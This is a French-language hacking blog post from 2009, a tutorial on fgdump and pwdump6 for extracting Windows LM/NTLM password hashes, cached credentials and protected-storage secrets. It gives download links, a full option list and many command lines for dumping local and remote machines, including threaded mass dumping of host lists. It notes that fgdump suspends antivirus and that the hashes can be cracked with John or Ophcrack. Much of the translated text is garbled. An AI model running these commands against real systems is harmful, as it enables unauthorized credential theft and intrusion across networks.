11/11/2009

Acquerir un .pwdump , Tuto fgdump

voici un outil sympa et simple qui permet de récupérer les hashs Windows. Il vous donnera plusieurs fichier dont un .pwdump qui pourra être réutilisé tranquillement et déchiffré avec d’autre outils (0phcrack, john…).

Attention outil clean mais détecté par certains Avs pour son utilisation malveillante possible et par sa fonction de suspension d’antivirus.

Fgdump

Fgdump

Vous les aurez surement reconnu, il s’agit évidemment de Fgdump et de Pwdump, qui permettent donc de récupérer les mots de passe cryptés LanMan et NTLM des systèmes Windows 2000, XP, Vista ou encore 2003.

Fgdump est une version de Pwdump6 un peu plus puissante car il permet de suspendre les antivirus afin d’éviter les conflits. Il peut aussi récupérer les credentials, c’est à dire les mots de passe enregistrés dans votre système comme ceux d’Internet Explorer et il peut être exécuté sous forme de processus multiples…

A l’utilisation, on préfèrera Fgdump par ses plus grandes possibilités

Téléchargment

Les deux softs sont heureusement gratuit

Il s’agit ici de la version bêta 2.0.

Télécharger Fgdump

Télécharger Fgdump avec la source

Télécharger Pwdump6

Télécharger Pwdump6 avec la source

Utilisation de Fgdump en ligne de commande

fgdump [-?][- t] [-c] [-w] [-s] [-r] [-v] [-k] [-o] [-a] [-log L] [T-threads ] [((-h host |-F filename)-u username-p mot de passe |-H filename)]
où nom d'utilisateur et mot de passe ont des droits d'administrateur

-? affiche l'aide (vous l'avez devant vous!)
-T permettra de tester la présence d'antivirus sans exécuter réellement la dépotoirs de passe
-c permet de passer le vidage du cache
-w saute le dump de passe
-s effectue la décharge stockage protégé
-r oublie Pwdump existants fichiers cachedump. Le comportement par défaut est de Passer un hôte si ces fichiers existent déjà.
-v permet de rendre la production plus verbeuse. Utiliser deux fois pour plus d'effet
-K garde la Pwdump / cachedump allant même si son antivirus est dans un état inconnu
-l journaux toutes les sorties vers logfile
-T va fgdump avec le nombre spécifié de threads parallèles
-H est le nom de l'hôte unique pour effectuer les dépôts contre
-f lit hôtes à partir d'une ligne de fichiers séparés
-H lectures hôte: Nom d'utilisateur: Mot de passe d'une ligne de fichiers séparés (par l'hôte cr edentials)
-o bennes dépotoirs histoire Pwdump
-A ne sera pas tenter de détecter ou d'arrêter l'antivirus, même si elle est présente

 

Utilisation

Dumping a machine locale avec l'utilisateur actuel

fgdump.exe

Assez simple. Utilise actuellement connecté utilisateur et mot de passe pour effectuer les dumping (cette personne doit évidemment être un administrateur).

 

Dumping la machine locale avec un compte différent

fgdump.exe-h 127.0.0.1-u AnAdministrativeUser

AnAdministrativeUser's compte sera utilisé pour effectuer le mot de passe dump contre la machine locale. Vous serez invité le mot de passe quand fgdump commence à exécuter.

 

Dumping une machine distante (192.168.0.10) en utilisant un utilisateur spécifié (1)

fgdump.exe-h 192.168.0.10-U AnAdministrativeUser

Ici, AnAdministrativeUser's compte sera utilisé pour effectuer le vidage de passe. Gardez à l'esprit que tout utilisateur utilisé pour effectuer des dépôts de passe besoins administratifs pouvoirs. Dans ce scénario, vous serez invité à entrer le mot de passe avant le commence à benne mot de passe.

 

Dumping une machine distante (192.168.0.10) en utilisant un utilisateur spécifié (2)

fgdump.exe-h 192.168.0.10-U AnAdministrativeUser-l4mep4ssw0rd p

La même chose que l'exemple précédent, seul le mot de passe est spécifié sur la commande ligne. Ceci est évidemment mal si quelqu'un est l'épaule du surf, mais rend les scripts fgdump beaucoup plus facile.

 

Dumping de nombreuses machines à distance, tous avec le même mot de passe

fgdump.exe-f hostfile.txt-u AnAdministrativeUser

Dans ce cas, hostfile.txt contient un hôte par ligne dans un fichier texte. Chaque hôte seront sous-évaluées en utilisant les pouvoirs des AnAdministrativeUser. Vous serez invité à entrer le mot de passe durant l'exécution de dump, mais vous pouvez spécifier un mot de passe en utilisant-p comme ci-dessus bien entendu.

 

Dumping de nombreuses machines à distance, chacun avec son propre nom d'utilisateur et Mot de passe

fgdump.exe-H combofile.txt

combofile.txt doit contenir la ligne des fichiers séparés de la forme hôte: l'utilisateur: Mot de passe où hôte est l'hôte individu d'être sous-évaluées, l'utilisateur est nom d'utilisateur de cet hôte et mot de passe est, évidemment, le mot de passe. Lignes qui ne ne pas suivre ce format seront ignorées

 

Beaucoup de dumping à distance des machines plus efficacement

fgdump.exe-f hostfile.txt-u AnAdministrativeUser-T 10

La forme de cette commande est similaire à plusieurs autres dépôts de la machine, et dans fait, ce formulaire peut être utilisé avec n'importe quel dump multi-machines. Le "T-10" paramètre spécifie que 10 threads simultanés devrait être utilisé. Cela signifie, effectivement, que 10 hôtes seront déversés à la même époque. Si le T-n'est pas utilisés, les hôtes seront sous-évaluées séquentiellement l'un à la fois, ce qui est très lente pour un grand nombre d'hôtes.

Gardez à l'esprit qu'il existe un point de rendement décroissant avec le fils, qui est, en utilisant un nombre comme 100 ne causent trop trash pour être de quelque utilité. Je Personnellement, j'aime les valeurs de 5 à 10, bien que certains de mes cohortes manivelle ce numéro aussi haut que 20. Si la performance semble vraiment mauvais, essayez de réduire le nombre de threads.

 

Dumping d'hôte et la sortie de journalisation

fgdump.exe-h 192.168.0.10-U AnAdministrativeUser-myoutput.log l

Toute sortie de la passe de vidage terme, ce sera en même temps par écrit à myoutput.log. Cela n'inclut pas les effectifs hachages de passe, mais plutôt toute état et des messages d'erreur. Ceci est particulièrement utile lorsque vous devez grep les hôtes échoué, ou lorsqu'elle est utilisée en conjonction avec la sortie en clair, comme le montre en dessous.

 

Dumping armées, la sortie de journalisation et affichage de messages verbeux

fgdump.exe-h 192.168.0.10-U AnAdministrativeUser-myoutput.log l-v-v

C'est le même que précédemment, mais vous aurez beaucoup plus de messages. Vous pouvez utiliser un V unique pour obtenir une sortie un peu moins si vous le désirez, mais depuis cette option on entend vraiment pour le débogage, il est souvent préférable d'utiliser juste-v-v. Exploitation forestière sortie est recommandé, aussi. Si vous avez besoin de me faire parvenir un rapport d'erreur, cette C'est ce que je souhaiterions que d'aider à découvrir le problème.

 

Dumping d'un hôte sans mot de passe Histories

fgdump.exe-h 192.168.0.10-U AnAdministrativeUser-o

Vous pouvez utiliser cette option si vous n'êtes pas intéressés par les histoires de dumping mot de passe. Histoires sont utiles si vous souhaitez repérer les tendances dans les mots de passe, tels que "spring07" changé pour «summer07" 90 jours plus tard. Incidemment, vous êtes actuellement pas en mesure de obtiennent leurs antécédents mot de passe de Vista, bien que fgdump doit vous informer de cette dans la sortie.

 

Dumping un hôte sans cachedump ou Pwdump sortie

fgdump.exe-h 192.168.0.10-U AnAdministrativeUser-c (ou-w pour sauter Pwdump)

Si vous ne voulez pas un type spécifique de la production (identification mises en cache ou décharges de passe), Vous pouvez invoquer le drapeau approprié ci-dessus pour les ignorer. Ignorant creds mis en cache sur Vista droit est quelque peu nécessaire maintenant, comme cachedump ne fonctionne pas actuellement contre Vista.

 

Dumping Protected Storage

fgdump.exe-H 192.168.0.10-u-s AnAdministrativeUser

Stockage protégé peut contenir des secrets intéressants, tels que mots de passe pour IE et Outlook si un utilisateur ont opté pour ces programmes se souvenir des mots de passe.

 

A quelques autres options existent, mais elles sont assez rarement utilisés, et l'aide devraient probablement fournir des informations suffisantes sur leur utilisation. Comme toujours, si il ya des questions, n'hésitez pas à me laisser tomber une ligne à Fizzgig-AT-foofus-dot-net.

17:00 Écrit par Schaka@ dans Piratage | Lien permanent | Commentaires (0) |  Facebook

Les commentaires sont fermés.